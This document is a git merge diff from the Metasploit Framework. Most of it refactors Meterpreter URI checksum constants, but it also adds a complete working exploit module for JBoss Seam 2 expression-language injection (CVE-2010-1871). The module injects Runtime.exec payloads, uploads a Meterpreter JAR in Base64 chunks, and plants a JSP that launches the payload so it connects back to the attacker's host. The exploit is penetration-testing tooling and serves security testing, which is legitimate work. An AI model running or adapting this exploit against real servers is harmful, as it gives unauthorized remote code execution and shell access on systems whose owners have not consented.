Merge branch 'upstream/master' into dynamic-transport
commit
c4b7426ba8
|
@ -5,6 +5,7 @@
|
|||
|
||||
require 'msf/core'
|
||||
require 'rex/parser/x509_certificate'
|
||||
require 'rex/payloads/meterpreter/uri_checksum'
|
||||
|
||||
module Msf
|
||||
|
||||
|
@ -17,6 +18,7 @@ module Msf
|
|||
module Handler::ReverseHttp::Stageless
|
||||
|
||||
include Msf::Payload::Windows::VerifySsl
|
||||
include Rex::Payloads::Meterpreter::UriChecksum
|
||||
|
||||
def initialize_stageless
|
||||
register_options([
|
||||
|
@ -25,7 +27,7 @@ module Handler::ReverseHttp::Stageless
|
|||
end
|
||||
|
||||
def generate_stageless(&block)
|
||||
checksum = generate_uri_checksum(Handler::ReverseHttp::UriChecksum::URI_CHECKSUM_CONN)
|
||||
checksum = generate_uri_checksum(URI_CHECKSUM_CONN)
|
||||
rand = Rex::Text.rand_text_alphanumeric(16)
|
||||
url = "https://#{datastore['LHOST']}:#{datastore['LPORT']}/#{checksum}_#{rand}/"
|
||||
|
||||
|
|
|
@ -99,14 +99,14 @@ module Payload::Windows::ReverseHttp
|
|||
raise ArgumentError, "Minimum StagerURILength is 5"
|
||||
end
|
||||
|
||||
"/" + generate_uri_checksum(Msf::Handler::ReverseHttp::URI_CHECKSUM_INITW, uri_req_len)
|
||||
"/" + generate_uri_checksum(Rex::Payloads::Meterpreter::UriChecksum::URI_CHECKSUM_INITW, uri_req_len)
|
||||
end
|
||||
|
||||
#
|
||||
# Generate the URI for the initial stager
|
||||
#
|
||||
def generate_small_uri
|
||||
"/" + generate_uri_checksum(Msf::Handler::ReverseHttp::URI_CHECKSUM_INITW)
|
||||
"/" + generate_uri_checksum(Rex::Payloads::Meterpreter::UriChecksum::URI_CHECKSUM_INITW)
|
||||
end
|
||||
|
||||
#
|
||||
|
|
|
@ -0,0 +1,311 @@
|
|||
#
|
||||
# This module requires Metasploit: http//metasploit.com/download
|
||||
# Current source: https://github.com/rapid7/metasploit-framework
|
||||
##
|
||||
|
||||
require 'rex/proto/http'
|
||||
require 'msf/core'
|
||||
|
||||
class Metasploit3 < Msf::Exploit::Remote
|
||||
Rank = NormalRanking
|
||||
|
||||
include Msf::Exploit::Remote::HttpClient
|
||||
include Msf::Auxiliary::Report
|
||||
include Msf::Exploit::FileDropper
|
||||
|
||||
|
||||
def initialize(info = {})
|
||||
super(update_info(info,
|
||||
'Name' => 'JBoss Seam 2 File Upload and Execute',
|
||||
'Description' => %q{
|
||||
Versions of the JBoss Seam 2 framework < 2.2.1CR2 fails to properly
|
||||
sanitize inputs to some JBoss Expression Language expressions. As a
|
||||
result, attackers can gain remote code execution through the
|
||||
application server. This module leverages RCE to upload and execute
|
||||
a meterpreter payload.
|
||||
|
||||
Versions of the JBoss AS admin-console are known to be vulnerable to
|
||||
this exploit, without requiring authentication. Tested against
|
||||
JBoss AS 5 and 6, running on Linux with JDKs 6 and 7.
|
||||
|
||||
This module provides a more efficient method of exploitation - it
|
||||
does not loop to find desired Java classes and methods.
|
||||
|
||||
NOTE: the check for upload success is not 100% accurate.
|
||||
NOTE 2: The module uploads the meterpreter JAR and a JSP to launch
|
||||
it.
|
||||
|
||||
},
|
||||
'Author' => [ 'vulp1n3 <vulp1n3[at]gmail.com>' ],
|
||||
'References' =>
|
||||
[
|
||||
# JBoss EAP 4.3.0 does not properly sanitize JBoss EL inputs
|
||||
['CVE', '2010-1871'],
|
||||
['URL', 'https://bugzilla.redhat.com/show_bug.cgi?id=615956'],
|
||||
['URL', 'http://blog.o0o.nu/2010/07/cve-2010-1871-jboss-seam-framework.html'],
|
||||
['URL', 'http://archives.neohapsis.com/archives/bugtraq/2013-05/0117.html']
|
||||
],
|
||||
'DisclosureDate' => "Aug 05 2010",
|
||||
'License' => MSF_LICENSE,
|
||||
'Platform' => %w{ java },
|
||||
'Targets' =>
|
||||
[
|
||||
[ 'Java Universal',
|
||||
{
|
||||
'Arch' => ARCH_JAVA,
|
||||
'Platform' => 'java'
|
||||
},
|
||||
]
|
||||
],
|
||||
'DefaultTarget' => 0
|
||||
))
|
||||
|
||||
register_options(
|
||||
[
|
||||
Opt::RPORT(8080),
|
||||
OptString.new('AGENT', [ true, "User-Agent to send with requests", "Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.0; Trident/4.0)"]),
|
||||
OptString.new('CTYPE', [ true, "Content-Type to send with requests", "application/x-www-form-urlencoded"]),
|
||||
OptString.new('TARGETURI', [ true, "URI that is built on JBoss Seam 2", "/admin-console/login.seam"]),
|
||||
OptInt.new('TIMEOUT', [ true, 'Timeout for web requests', 10]),
|
||||
OptString.new('FNAME', [ false, "Name of file to create - NO EXTENSION! (default: random)", nil]),
|
||||
OptInt.new('CHUNKSIZE', [ false, 'Size in bytes of chunk per request', 1024]),
|
||||
], self.class)
|
||||
end
|
||||
|
||||
|
||||
def check
|
||||
vprint_status("#{rhost}:#{rport} Checking for vulnerable JBoss Seam 2")
|
||||
uri = target_uri.path
|
||||
res = send_request_cgi(
|
||||
{
|
||||
'uri' => normalize_uri(uri),
|
||||
'method' => 'POST',
|
||||
'ctype' => datastore['CTYPE'],
|
||||
'agent' => datastore['AGENT'],
|
||||
'data' => "actionOutcome=/success.xhtml?user%3d%23{expressions.getClass().forName('java.lang.Runtime').getDeclaredMethod('getRuntime')}"
|
||||
}, timeout=datastore['TIMEOUT'])
|
||||
if (res and res.code == 302 and res.headers['Location'])
|
||||
vprint_debug("Server sent a 302 with location")
|
||||
if (res.headers['Location'] =~ %r(public\+static\+java\.lang\.Runtime\+java.lang.Runtime.getRuntime\%28\%29))
|
||||
report_vuln({
|
||||
:host => rhost,
|
||||
:port => rport,
|
||||
:name => "#{self.name} - #{uri}",
|
||||
:refs => self.references,
|
||||
:info => "Module #{self.fullname} found vulnerable JBoss Seam 2 resource."
|
||||
})
|
||||
return Exploit::CheckCode::Vulnerable
|
||||
else
|
||||
return Exploit::CheckCode::Safe
|
||||
end
|
||||
else
|
||||
return Exploit::CheckCode::Unknown
|
||||
end
|
||||
|
||||
# If we reach this point, we didn't find the service
|
||||
return Exploit::CheckCode::Unknown
|
||||
end
|
||||
|
||||
|
||||
def execute_cmd(cmd)
|
||||
cmd_to_run = Rex::Text.uri_encode(cmd)
|
||||
vprint_status("#{rhost}:#{rport} Sending command: #{cmd_to_run}")
|
||||
uri = target_uri.path
|
||||
res = send_request_cgi(
|
||||
{
|
||||
'uri' => normalize_uri(uri),
|
||||
'method' => 'POST',
|
||||
'ctype' => datastore['CTYPE'],
|
||||
'agent' => datastore['AGENT'],
|
||||
'data' => "actionOutcome=/success.xhtml?user%3d%23{expressions.getClass().forName('java.lang.Runtime').getDeclaredMethod('getRuntime').invoke(expressions.getClass().forName('java.lang.Runtime')).exec('#{cmd_to_run}')}"
|
||||
}, timeout=datastore['TIMEOUT'])
|
||||
if (res and res.code == 302 and res.headers['Location'])
|
||||
if (res.headers['Location'] =~ %r(user=java.lang.UNIXProcess))
|
||||
vprint_status("#{rhost}:#{rport} Exploit successful")
|
||||
else
|
||||
vprint_status("#{rhost}:#{rport} Exploit failed.")
|
||||
end
|
||||
else
|
||||
vprint_status("#{rhost}:#{rport} Exploit failed.")
|
||||
end
|
||||
end
|
||||
|
||||
|
||||
def call_jsp(jspname)
|
||||
# TODO ugly way to strip off last resource on a path
|
||||
uri = target_uri.path
|
||||
*keep,ignore = uri.split(/\//)
|
||||
keep.push(jspname)
|
||||
uri = keep.join("/")
|
||||
uri = "/" + uri if (uri[0] != "/")
|
||||
|
||||
res = send_request_cgi(
|
||||
{
|
||||
'uri' => normalize_uri(uri),
|
||||
'method' => 'POST',
|
||||
'ctype' => datastore['CTYPE'],
|
||||
'agent' => datastore['AGENT'],
|
||||
'data' => "sessionid=" + Rex::Text.rand_text_alpha(32)
|
||||
}, timeout=datastore['TIMEOUT'])
|
||||
if (res and res.code == 200)
|
||||
vprint_status("Successful request to JSP")
|
||||
else
|
||||
vprint_error("Failed to request JSP")
|
||||
end
|
||||
end
|
||||
|
||||
|
||||
def upload_jsp(filename,jarname)
|
||||
jsp_text = <<EOJSP
|
||||
<%@ page import="java.io.*"
|
||||
%><%@ page import="java.net.*"
|
||||
%><%
|
||||
URLClassLoader cl = new java.net.URLClassLoader(new java.net.URL[]{new java.io.File(request.getRealPath("/#{jarname}")).toURI().toURL()});
|
||||
Class c = cl.loadClass("metasploit.Payload");
|
||||
c.getMethod("main",Class.forName("[Ljava.lang.String;")).invoke(null,new java.lang.Object[]{new java.lang.String[0]});
|
||||
%>
|
||||
EOJSP
|
||||
vprint_status("Uploading JSP to launch payload")
|
||||
status = upload_file_chunk(filename,'false',jsp_text)
|
||||
if status
|
||||
vprint_status("JSP uploaded to to #{filename}")
|
||||
else
|
||||
vprint_error("Failed to upload file.")
|
||||
end
|
||||
|
||||
@pl_sent = true
|
||||
end
|
||||
|
||||
|
||||
def upload_file_chunk(filename, append='false', chunk)
|
||||
# create URL-safe Base64-encoded version of chunk
|
||||
b64 = Rex::Text.encode_base64(chunk)
|
||||
b64 = b64.gsub("+","%2b")
|
||||
b64 = b64.gsub("/","%2f")
|
||||
|
||||
uri = target_uri.path
|
||||
res = send_request_cgi(
|
||||
{
|
||||
'uri' => normalize_uri(uri),
|
||||
'method' => 'POST',
|
||||
'ctype' => datastore['CTYPE'],
|
||||
'agent' => datastore['AGENT'],
|
||||
'data' => "actionOutcome=/success.xhtml?user%3d%23{expressions.getClass().forName('java.io.FileOutputStream').getConstructor('java.lang.String',expressions.getClass().forName('java.lang.Boolean').getField('TYPE').get(null)).newInstance(request.getRealPath('/#{filename}').replaceAll('\\\\\\\\','/'),#{append}).write(expressions.getClass().forName('sun.misc.BASE64Decoder').getConstructor(null).newInstance(null).decodeBuffer(request.getParameter('c'))).close()}&c=" + b64
|
||||
}, timeout=datastore['TIMEOUT'])
|
||||
if (res and res.code == 302 and res.headers['Location'])
|
||||
# TODO Including the conversationId part in this regex might cause
|
||||
# failure on other Seam applications. Needs more testing
|
||||
if (res.headers['Location'] =~ %r(user=&conversationId))
|
||||
#vprint_status("#{rhost}:#{rport} Exploit successful.")
|
||||
return true
|
||||
else
|
||||
#vprint_status("#{rhost}:#{rport} Exploit failed.")
|
||||
return false
|
||||
end
|
||||
else
|
||||
#vprint_status("#{rhost}:#{rport} Exploit failed.")
|
||||
return false
|
||||
end
|
||||
end
|
||||
|
||||
|
||||
def get_full_path(filename)
|
||||
#vprint_debug("Trying to find full path for #{filename}")
|
||||
|
||||
uri = target_uri.path
|
||||
res = send_request_cgi(
|
||||
{
|
||||
'uri' => normalize_uri(uri),
|
||||
'method' => 'POST',
|
||||
'ctype' => datastore['CTYPE'],
|
||||
'agent' => datastore['AGENT'],
|
||||
'data' => "actionOutcome=/success.xhtml?user%3d%23{request.getRealPath('/#{filename}').replaceAll('\\\\\\\\','/')}"
|
||||
}, timeout=datastore['TIMEOUT'])
|
||||
if (res and res.code == 302 and res.headers['Location'])
|
||||
# the user argument should be set to the result of our call - which
|
||||
# will be the full path of our file
|
||||
matches = /.*user=(.+)\&.*/.match(res.headers['Location'])
|
||||
#vprint_debug("Location is " + res.headers['Location'])
|
||||
if (matches and matches.captures)
|
||||
return Rex::Text::uri_decode(matches.captures[0])
|
||||
else
|
||||
return nil
|
||||
end
|
||||
else
|
||||
return nil
|
||||
end
|
||||
end
|
||||
|
||||
|
||||
def java_stager(fname, chunk_size)
|
||||
@payload_exe = fname + ".jar"
|
||||
jsp_name = fname + ".jsp"
|
||||
|
||||
#data = payload.encoded_jar.pack
|
||||
data = payload.encoded_jar.pack
|
||||
|
||||
append = 'false'
|
||||
while (data.length > chunk_size)
|
||||
status = upload_file_chunk(@payload_exe, append, data[0, chunk_size])
|
||||
if status
|
||||
vprint_debug("Uploaded chunk")
|
||||
else
|
||||
vprint_error("Failed to upload chunk")
|
||||
break
|
||||
end
|
||||
data = data[chunk_size, data.length - chunk_size]
|
||||
# first chunk is an overwrite, afterwards, we need to append
|
||||
append = 'true'
|
||||
end
|
||||
status = upload_file_chunk(@payload_exe, 'true', data)
|
||||
if status
|
||||
vprint_status("Payload uploaded to " + @payload_exe)
|
||||
else
|
||||
vprint_error("Failed to upload file.")
|
||||
end
|
||||
|
||||
# write a JSP that can call the payload in the jar
|
||||
upload_jsp(jsp_name, @payload_exe)
|
||||
|
||||
pe_path = get_full_path(@payload_exe) || @payload_exe
|
||||
jsp_path = get_full_path(jsp_name) || jsp_name
|
||||
# try to clean up our stuff;
|
||||
register_files_for_cleanup(pe_path, jsp_path)
|
||||
|
||||
# call the JSP to launch the payload
|
||||
call_jsp(jsp_name)
|
||||
end
|
||||
|
||||
def exploit
|
||||
@pl_sent = false
|
||||
|
||||
if check == Exploit::CheckCode::Vulnerable
|
||||
|
||||
fname = datastore['FNAME'] || Rex::Text.rand_text_alpha(8+rand(8))
|
||||
|
||||
vprint_status("#{rhost}:#{rport} Host is vulnerable")
|
||||
vprint_status("#{rhost}:#{rport} Uploading file...")
|
||||
|
||||
# chunking code based on struts_code_exec_exception_delegator
|
||||
append = 'false'
|
||||
chunk_size = datastore['CHUNKSIZE']
|
||||
# sanity check
|
||||
if (chunk_size <= 0)
|
||||
vprint_error("Invalid chunk size #{chunk_size}")
|
||||
return
|
||||
end
|
||||
|
||||
vprint_debug("Sending in chunks of #{chunk_size}")
|
||||
|
||||
case target['Platform']
|
||||
when 'java'
|
||||
java_stager(fname, chunk_size)
|
||||
else
|
||||
fail_with(Failure::NoTarget, 'Unsupported target platform!')
|
||||
end
|
||||
|
||||
handler
|
||||
end
|
||||
end
|
||||
end
|
||||
|
|
@ -54,7 +54,7 @@ module Metasploit3
|
|||
c << "URL=http://#{datastore["LHOST"]}"
|
||||
c << ":#{datastore["LPORT"]}" if datastore["LPORT"]
|
||||
c << "/"
|
||||
c << generate_uri_checksum(Msf::Handler::ReverseHttp::URI_CHECKSUM_INITJ, uri_req_len)
|
||||
c << generate_uri_checksum(Rex::Payloads::Meterpreter::UriChecksum::URI_CHECKSUM_INITJ, uri_req_len)
|
||||
c << "\n"
|
||||
|
||||
c
|
||||
|
|
|
@ -56,7 +56,7 @@ module Metasploit3
|
|||
c << "URL=https://#{datastore["LHOST"]}"
|
||||
c << ":#{datastore["LPORT"]}" if datastore["LPORT"]
|
||||
c << "/"
|
||||
c << generate_uri_checksum(Msf::Handler::ReverseHttp::URI_CHECKSUM_INITJ, uri_req_len)
|
||||
c << generate_uri_checksum(Rex::Payloads::Meterpreter::UriChecksum::URI_CHECKSUM_INITJ, uri_req_len)
|
||||
c << "\n"
|
||||
|
||||
c
|
||||
|
|
|
@ -106,7 +106,7 @@ module Metasploit3
|
|||
uri_req_len = 5
|
||||
end
|
||||
|
||||
generate_uri_checksum(Msf::Handler::ReverseHttp::URI_CHECKSUM_INITP, uri_req_len)
|
||||
generate_uri_checksum(Rex::Payloads::Meterpreter::UriChecksum::URI_CHECKSUM_INITP, uri_req_len)
|
||||
end
|
||||
|
||||
end
|
||||
|
|
|
@ -120,7 +120,7 @@ module Metasploit3
|
|||
uri_req_len = 5
|
||||
end
|
||||
|
||||
generate_uri_checksum(Msf::Handler::ReverseHttp::URI_CHECKSUM_INITP, uri_req_len)
|
||||
generate_uri_checksum(Rex::Payloads::Meterpreter::UriChecksum::URI_CHECKSUM_INITP, uri_req_len)
|
||||
end
|
||||
|
||||
end
|
||||
|
|
|
@ -99,7 +99,7 @@ module Metasploit3
|
|||
def generate
|
||||
p = super
|
||||
i = p.index("/12345\x00")
|
||||
u = "/" + generate_uri_checksum(Msf::Handler::ReverseHttp::URI_CHECKSUM_INITW) + "\x00"
|
||||
u = "/" + generate_uri_checksum(Rex::Payloads::Meterpreter::UriChecksum::URI_CHECKSUM_INITW) + "\x00"
|
||||
p[i, u.length] = u
|
||||
p + datastore['LHOST'].to_s + "\x00"
|
||||
end
|
||||
|
|
|
@ -6,7 +6,6 @@
|
|||
|
||||
require 'msf/core'
|
||||
require 'msf/core/handler/reverse_https'
|
||||
#require 'msf/core/payload/windows/x64/reverse_https'
|
||||
|
||||
module Metasploit3
|
||||
|
||||
|
|
Loading…
Reference in New Issue